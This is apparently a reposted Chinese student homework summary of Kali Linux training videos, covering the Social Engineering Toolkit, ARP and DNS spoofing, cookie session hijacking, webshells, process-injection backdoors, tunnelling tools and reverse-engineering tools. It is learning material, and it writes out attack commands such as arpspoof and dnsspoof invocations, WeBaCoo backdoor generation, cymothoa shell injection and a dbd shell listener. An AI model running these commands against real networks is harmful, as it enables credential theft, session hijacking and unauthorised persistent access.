网络攻防第八周作业
kali視頻(31-35)學習
Kali漏洞利用之SET
Social Engineering Toolkit(SET)是一個開源、Python驅動的社會工程學滲透測試工具。提供了非常豐富的攻擊向量庫。是開源的社會工程學
利用套件,通常結合metasploit來使用。
命令行下輸入
setoolkit打開SET套件
菜單選項1是社會工程學攻擊,輸入1回車,可以看到相應模塊
1)魚叉式釣魚攻擊(Spear-Phishing Attack Vectors) 2)網站攻擊(Website Attack Vectors) 3)介質感染攻擊(Infectious Media Generator) 4)創建Payload并監聽(Create a Payload and Listener) 5)群發郵件攻擊(Mass Mailer Attack) 6)基于Arduino的攻擊(Arduino-Based Attack Vector) 7)無線接入點攻擊(Wireless Access Point Attack Vector) 8)二維碼攻擊(QRCode Generator Attack Vector) 9)powershell攻擊(Powershell Attack Vectors) 10)短信欺騙攻擊(SMS Spoofing Attack Vector) 11)第三方模塊(Third Party Modules)魚叉式釣魚攻擊
此攻擊向量主要目的為發送存在惡意軟件的釣魚郵件。
相應的Payload可以選擇不同的漏洞。
網站攻擊框架
此時可以開放一個WEBSever服務,如果對方訪問此頁面,若系統存在漏洞觸發條件,則會被傳送payload,之后植入后門。
如Java Applet Attack方法就是需要目標有Java運行環境,并且它提供一個功能,就是“site Cloner”可以將一個網站克隆過來,可以通過內網
的域名欺騙,或者arp劫持,這樣對面就可以訪問你的頁面,如果你的頁面存在漏洞,對方如果沒有打完整的補丁就會中招。
介質感染攻擊【光盤漏洞】:借助Autorun.inf執行Exploit得到一個返回的shell,也可以結合Metasploit的后門。【曾經的u盤木馬】
創建Payload和監聽器listener,類似Metasploit,設置一個反向后門。
群發郵件攻擊:把帶有惡意軟件的郵件發送給每個人,支持導入列表并向列表中的每個人發送郵件。
短信欺騙攻擊(SMS Spoofing Attack Vector):偽造短信的來源。
基于Andruino的攻擊
無線接入點攻擊(Wireless Access Point Attack Vector):無線接入點攻擊會創建一個虛擬無線AP,通過接入點ap可以抓取所有連接進來的設
備流量。
二維碼攻擊(QRCode Generator Attack Vector):填入一個危險的URL,使得被攻擊者掃描二維碼自動訪問頁面而中招。
powershell攻擊(Powershell Attack Vectors):針對vista以上的攻擊模塊。
第三方模塊(Third Party Modules)
選項2是Fast-Track Penetration
比如常見expsql爆破等等過去常見的exp、
Kali嗅探欺騙與中間人攻擊【一次實例】
Linux下的中間人攻擊套路都是一樣的,這里介紹進行ARP欺騙、DNS欺騙和嗅探以及會話劫持(cookies)的方法。
為kali設置開啟端口轉發
echo 1 > /proc/sys/net/ipv4/ip_forward設置ssltrip
為了劫持ssl數據,需要使https數據變為http:
讓sslstrip在8081端口監聽:ssltrip -l 8081
ettercap【重要】
ettercap是一套用于中間人攻擊的工具。和dsniff套件齊名。支持插件和過濾腳本,直接將賬號、密碼顯示出來,不用人工提取數據。如果是第一次中間人攻擊操作,那么要對kali下的etteracp做點配置。
1)配置文件是/etc/ettercap/etter.conf,首先要將ec_uid、ec_gid都變為0。
2)然后找到linux分類下的if you use iptables這一行,將下面兩行的注釋(“#”號)去掉,打開轉發。
3)打開圖形化界面
ettercap -G4)選擇嗅探網卡 默認eth0
5)Ettercap使用
打開ettercap,選擇hosts選項:先scan for hosts,等掃描完了選host list。
將網關add to target 1/想攻擊的目標add to target 2,mitm選項卡arp-poisoning,然后start sniffing就可以了。
靶機:當同處一個局域網的受害者訪問網頁,進行登錄時,它的密碼就被記錄了,不安全的連接。
查看被監聽主機之間的所有連接信息,依次點擊View--Connections。
Dsniff套裝介紹【重要】
Dsniff套裝主要是arpspoof和dsniff,前者用來進行arp欺騙,后者用于嗅探。進行攻擊步驟如下:
1)進行arp欺騙
arpspoof [-i interface(網卡)] [-c own|host|both(欺騙方式,通常是both)] [-t target(目標)] [-r] host(網關)
2)進行嗅探
dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile] [expression]
-c打開半雙工TCP流,允許在使用arpspoof時進行正確的嗅探操作;
-d啟動調試模式;
-f以/etc/service格式從文件中加載觸發器(也就是口令嗅探的服務類型);
-I使用特定的網絡接口;
-m使用dsniff.magic文件通過在magic文件中定義的特征嘗試自動判斷協議;
-n不執行主機查找;
-r從前面保存的會話中讀取被嗅探的數據;
-s最多對報文的前個字節進行嗅探,如果用戶名和口令信息包含在隨后的默認1024字節界限中;
-t使用格式port/proto=servise;來加載一個以逗號界定的觸發器集;
會話劫持
這里主要以cookies進行舉例,說明會話劫持的用法。
1)開始arp欺騙:arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102
2)捕獲數據報:tcpdump -i wlan -w test.cap
等一段時間,估計目標會登錄網站了,我們開始處理捕獲的數據包:forret -r test.cap。
3)如果捕獲的數據包沒什么問題,而且確定開啟了端口轉發,那么經過處理的數據包會自動生成hamster.txt
接下來運行hamster hamster,會提示瀏覽器設置代理為http://127.0.0.1:1234
4)接著在瀏覽器中代開hamster:http://hamster
選擇目標和可能的登錄認證地址,然后點擊鏈接會發現劫持成功。
圖片截獲
利用Driftnet這款工具我們可以看到受害人在訪問網站的圖片。
首先依然使用arpspoof啟動arp欺騙,然后啟動driftnet:driftent -i。
此時彈出一個小窗口,當目標訪問有圖片的網站的時候,攻擊者就能在這個小窗口看到。
DNS欺騙
利用Dsniff套裝中的dnsspoof或者ettercap的dnsspoof插件,我們可以完成對受害者的dns欺騙。
1)在開始欺騙前,首先我們要編輯一個自己的hosts文件,放在方便訪問的地方。內容和本機自帶的hosts內容差不多,只是把你想欺騙的域名和
想要欺騙到哪里的地址寫好(通常是攻擊者指定的服務器,用來執行瀏覽器溢出或者java applet攻擊,用來獲取受害者的計算機訪問權限)
2)host文件:127.0.0.1 www.baidu.com。上面是一個hosts文件示例,把百度定向到了本機。我們把它保存成hosts,位于/root目錄下。
3)然后啟動dnsspoof:dnsspoof -i wlan0 -f /root/hosts,等受害者訪問百度觀察效果。
URL監控
利用Dsniff套裝中的urlsnarf工具,我們對TCP80、3128、8080端口的HTTP通信進行解析,并且可以將嗅探到的所有HTTP請求轉存為通用日志格式
(Common Log Format,CLF),這種格式是許多Web服務器所使用的,例如IIS和Apache,事后可以很方便的使用一些日志分析工具來分析記錄結
果。
Usage:urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]
下載軟件監控
利用Dsniff套裝中的filesnarf工具,我們可以從嗅探到的NFS通信中,選定某個文件,轉存到本地當前工作目錄。
Ussage:filesnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]
Kali權限維持之后門
目的:繞過網絡限制,或者網絡配置,主要就是使用socket進行代理進行內網探測,這些需要熟練掌握
權限維持包含Tunnel工具集、Web后門、系統后門三個子類。其中系統后門與web后門統稱后門,都是為滲透測試后,為方便再次進入系統而留下的惡意程序。
Weevely【非常好用,非常重要】
Weevely是一款使用python編寫的webshell工具,可以算作是linux下的一款菜刀替代工具(限于php)。
這樣就能獲得一個web的shell
WeBaCoo--php后門
WeBaCoo(Web Backdoor Cookie)script-kit是一個小巧的、隱蔽的php后門,它提供了一個可以連接遠程web服務器并執行php代碼的終端。
WeBaCoo使用HTTP響應頭傳送命令結果,shell命令經base64編碼后隱藏在Cookie頭中。
webacoo -g -o ~/2.php // 1)生成后門 webacoo -t -u http://xxx.xxx.xxx.xxx/2.php// 2)連接后門之后通過加入“:”執行本地命令,不加則借助webshell執行命令。比如執行:ls,whoami,cat/etc/issue
Cymotha--創建系統的后門
后門注入到bash進程中去,首先枚舉/bin/bsh進程的pid
cymothoa -p 10500 -s 0 -y 23333//注入2333端口,如果成功就能連接23333端口返回一個shelldbd和sbd--加密版的nc
dbd -l -p 2333 -e /bin/bash -k password//監聽端 dbd 127.0.0.1 2333 -k password//連接端,主動連接U3-Pwn
與Metasploit Payload結合使用工具,從菜單可以單刀多針對移動設備如光驅鏡像、U盤等。
Intersect【比較強大】
1)使用“2”列出可以使用的模塊
2)創建后門腳本使用“1”,自由添加功能組件,生成shell。
如:
3)綁定
4)連接:
Kali權限維持之Tunnel
權限維持包含Tunnel工具集、Web后門、系統后門三個子類。Tunnel工具集包含了一系列用于創建通信隧道、代理的工具。
cryptcat
Netcat的隧道加密版的網絡工具,與dbd,sbd使用也是類似。(百度一下就很多使用方法)
DNS2TCP
DNS Tunnel,就是DNS的一個隧道,利用DNS查詢過程建立起隧道,傳輸數據。
比如你在酒店,機場等地方,有WiFi信號,打開一個網站會彈出個窗口,是需要你登錄才能夠繼續上網的。這個時候你沒有賬號,上不了網。但是有的時候你會發現你獲得的DNS是有效的,我么可以通過DNS tunnel技術進行免費上網。
原理:
從DNS協議看,你在向外查詢某個域名,實際上你在和外部通訊,你沒有直接鐮刀局域網外的機器,因為網管不會轉發你的ip包出去,但是在就往上的DNS服務器幫你做了中專,這就是DNS Tunnel。
工具還有:OzymanDNS,tcp-over-dns,heyoka,iodine,dns2tcp。【DNS實現免費上網的過程】
Miredo--不支持ipv6的網絡支持ipv6
Miredo是一個網絡工具,主要用于BSD和Linux的IPV6 Teredo隧道鏈接,可以轉換不支持IPV6的網絡連接IPV6,但內核中需要有IPV6和TUN隧道支持。
Proxytunnel【經常用到,要好好掌握】
比如使用Meterpreter開設了一個Socks4a代理服務,修改配置文件加入代理,就可以去使用sqlmap或者nmap直接使用代理掃描內網。
nano /etc/proxychains.conf //修改配置文件,把最下面的代理文件改成剛剛配置好的那個文件 proxychains nmap -sT -Pn 10.0.0.1/24 //使用代理掃描內網Proxytunnel【現實生活中有應用】
可通過標準的HTTPS代理來連接遠程服務器,這是一個代理,實現了橋接的功能。特別用于通過SSH進行HTTP(S)傳輸。
ptunnel--借助icmp數據包建立隧道通信。
pwnat--內網下通過udp通信。
socat--功能繁雜,需要自己搞測試試試,可以在不同協議上進行轉發數據。
sslh--是一個ssl/ssh端口復用工具
sslh可以在同一個端口上接受https,ssh和openvpn連接,這使得通過443端口連接ssh服務器或者openvpn服務同時在該端口上提供https服務成為可能,sslh可以作為一個研究端口復用的例子。
Stunnel--
Udptunnel--
Kali逆向工程工具
主要包括調試器,反編譯工具和逆向工具。
逆向工程是根據已有的東西和結果,通過分析來推導出具體的實現辦法。比如看到別人寫的某個exe程序能夠做出某種漂亮的動畫效果,你通過反匯編、反編譯和動態跟蹤等方法,分析出其動畫效果的實現過程,這種行為就是逆向工程:不僅僅是反編譯,而且還要推導出設計,并且文檔化,逆向軟件工程的目的是使軟件得以維護。
edb-debugger--圖形化界面
基于qt4開發的二進制調試工具,主要是為了跟ollydbg工具看齊,通過插件體系可進行功能的擴充。
Ollydbg【超級經典的調試工具】
kali下按照Wine方式進行運行
Jad——一個Java反編譯工具,
Radare2--開放源代碼的逆向工程平臺
它可以反匯編、調試、分析和操作二進制文件。
Recstudio——UI,反編譯工具
Apktool--APK編譯工具
APKTool是google提供的APK編譯工具,能夠反編譯及回編譯apk,同時安裝反編譯系統apk所需要的framewo-res框架。
Clang 、Clang++
Clang是一個C語言、C++、Objective C、Objective C++語言的輕量級編譯器。
D2j-dex2jar--反編譯dex文件到jar文件,進而可以用其他工具查看源代碼。
Flasm--好用的swf文件修改
flasm主要功能是用于直接修改swf文件里的腳本actionscript。只修改代碼,資源數據不做修改。
Javasnoop--UI,java應用程序安全測試工具
Javasnoop是一個java應用程序安全測試工具,它允許你以攔截的方法,篡改數據和hack運行在你計算機上的java應用程序。通常在沒有源代碼的情況下,測試java客戶端的安全性最好的結果是不可預知的,最壞的結果是不切實際的。
如果有源碼的情況下,運行一個java程序和遠程附加一個調試器進行調試,單步運行。但是對于一個applet來說做到這一點非常難,當需要修改客戶端和服務端的通訊時,客戶端做代理,代理上修改數據。但是問題是數據一般不是明文,可能是各種協議,序列化對象,加密數據或者多種應用。
這個工具就是嘗試解決這些問題,通過附加到一個運行的進程中,然后通過篡改方法調用,運行自定義代碼或者監視系統發生。
轉載于:https://www.cnblogs.com/zhangyuxiang666/p/10726798.html
總結
- 上一篇: 【题解】数的计数
- 下一篇: go语言有哪些劣势?